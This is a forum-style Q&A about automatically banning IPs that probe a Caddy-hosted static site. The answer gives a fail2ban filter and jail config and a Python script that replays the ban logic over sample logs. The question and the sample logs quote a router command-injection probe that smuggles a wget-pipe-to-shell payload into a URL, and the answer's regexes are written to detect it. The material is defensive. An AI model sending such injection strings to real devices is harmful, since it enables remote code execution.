How to automatically block IPs that try to exploit URLs?
I have a static website I serve with Caddy. The Caddy is inside a container.
I notice that occasionally I get malicious requests, looking at the paths requested. Some examples are:
```
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://[ some ip ]/t+-O-+|+sh`)
/backup
/wp-admin/css/about.php
```
These are obviously hackers trying some common exploits to see if they'll get lucky and I want to block them automatically. For example, I could provide a list of string patterns and maybe any IP that requests a path that matches those will get an IP ban for a month.
I realize hackers can obtain fresh IPs in various ways. I still want to do the IP ban just to make their life harder.
How can I do this?
1 answer
If these requests are logged into a log file you can install fail2ban and configure it to act on these log entries. You can configure it to block the requests via the local firewall for a duration of your choosing.
This would be a very basic (and untested) example:
You create a service definition `/etc/fail2ban/filter.d/myservice.conf`:

```
[Definition]
# <HOST> is mandatory: fail2ban substitutes an IP-matching group for it and bans
# whatever that group captures. This assumes the client IP is the first field of
# the log line; adjust the prefix to wherever the IP sits in your log format.
# [^\/]+ matches whatever host the payload points at (the question only shows a placeholder).
failregex = ^<HOST> .*\$\(id>`wget\+http:\/\/[^\/]+\/t\+-O-\+\|\+sh`
```
You can test it with the command `fail2ban-regex`:

```
fail2ban-regex /var/log/myservice.log /etc/fail2ban/filter.d/myservice.conf
```
Then you create a jail that uses this filter in `/etc/fail2ban/jail.d/myservice.conf`:

```
# service name
[myservice]
# turn on/off
enabled = true
# ports to ban (numeric or text)
port = http,https
# filter from previous step
filter = myservice
# file to parse
logpath = /var/log/myservice.log
# ban rule:
# 5 matching hits within 1 minute (findtime is in seconds)
maxretry = 5
findtime = 60
# ban for 10 minutes (seconds)
bantime = 600
```
This assumes that your service is accessed via the regular HTTP/HTTPS ports; those are what get blocked.
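To make the maxretry/findtime/bantime semantics of the jail above concrete, here is a small Python replay of that logic over Caddy's JSON access log. This is an added example, not code from the answer or from fail2ban or Caddy; it assumes Caddy 2's default JSON log layout (`ts`, `request.remote_ip`, `request.uri`), the log lines are constructed for the example, and the path patterns are the ones quoted in the question. It generalizes the single-regex filter to a list of patterns and applies the same sliding-window ban rule the jail configures.

```python
import json
import re
from collections import defaultdict, deque

# Constructed Caddy-style JSON access log lines (made-up traffic, documentation
# address ranges). The field layout follows Caddy 2's default JSON access log.
SAMPLE_LOG = """\
{"ts":1700000000.0,"request":{"remote_ip":"203.0.113.10","uri":"/index.html"},"status":200}
{"ts":1700000001.0,"request":{"remote_ip":"198.51.100.7","uri":"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://192.0.2.1/t+-O-+|+sh`)"},"status":404}
{"ts":1700000002.0,"request":{"remote_ip":"198.51.100.7","uri":"/backup"},"status":404}
{"ts":1700000003.0,"request":{"remote_ip":"198.51.100.7","uri":"/wp-admin/css/about.php"},"status":404}
{"ts":1700000004.0,"request":{"remote_ip":"198.51.100.7","uri":"/wp-admin/"},"status":404}
{"ts":1700000005.0,"request":{"remote_ip":"198.51.100.7","uri":"/backup"},"status":404}
{"ts":1700000100.0,"request":{"remote_ip":"203.0.113.10","uri":"/wp-admin/css/about.php"},"status":404}
{"ts":1700000500.0,"request":{"remote_ip":"203.0.113.10","uri":"/about.html"},"status":200}
"""

# Path patterns taken from the probes quoted in the question. Anchored at the
# start of the URI so a legitimate page that merely mentions "backup" is not hit.
SUSPICIOUS = [
    re.compile(r"^/cgi-bin/"),
    re.compile(r"^/wp-admin/"),
    re.compile(r"^/backup(?:$|[?/])"),
    re.compile(r"\$\(|`"),  # shell command substitution smuggled into the URI
]


def is_suspicious(uri: str) -> bool:
    """True if the request path matches any of the probe patterns."""
    return any(p.search(uri) for p in SUSPICIOUS)


def parse_line(line: str):
    """Return (timestamp, client_ip, uri) from one Caddy JSON log line, or None if unparseable."""
    try:
        rec = json.loads(line)
        return float(rec["ts"]), rec["request"]["remote_ip"], rec["request"]["uri"]
    except (ValueError, KeyError, TypeError):
        return None


def evaluate(log_text: str, maxretry: int = 5, findtime: float = 60, bantime: float = 600):
    """Replay log lines in order and return {ip: ban_expiry_timestamp}.

    Mirrors the jail settings: an IP is banned once it has produced `maxretry`
    matching requests inside a sliding window of `findtime` seconds, and the
    ban lasts `bantime` seconds from the triggering request.
    """
    hits = defaultdict(deque)  # ip -> timestamps of recent matching requests
    bans = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, uri = parsed
        if not is_suspicious(uri):
            continue
        window = hits[ip]
        window.append(ts)
        while window and window[0] < ts - findtime:
            window.popleft()  # drop hits that fell out of the findtime window
        if len(window) >= maxretry and bans.get(ip, 0) <= ts:
            bans[ip] = ts + bantime
            window.clear()  # start counting afresh after the ban expires
    return bans


def is_banned(bans, ip: str, now: float) -> bool:
    """True while a ban recorded in `bans` is still in force at time `now`."""
    return bans.get(ip, 0) > now


if __name__ == "__main__":
    for ip, until in evaluate(SAMPLE_LOG).items():
        print(f"{ip} banned until ts={until}")
```

With the defaults (maxretry 5, findtime 60, bantime 600) only the scanner at 198.51.100.7 is banned; the single `/wp-admin/` request from 203.0.113.10 stays below the threshold, which is why a threshold above 1 is worth keeping even for obviously hostile paths. Two points matter for the container setup in the question: Caddy must write its access log to a path mounted from the host so fail2ban can read it, and if Caddy's ports are published by Docker, fail2ban's default iptables actions insert rules into the INPUT chain, which Docker's forwarded traffic bypasses; rules for containers belong in the DOCKER-USER chain instead.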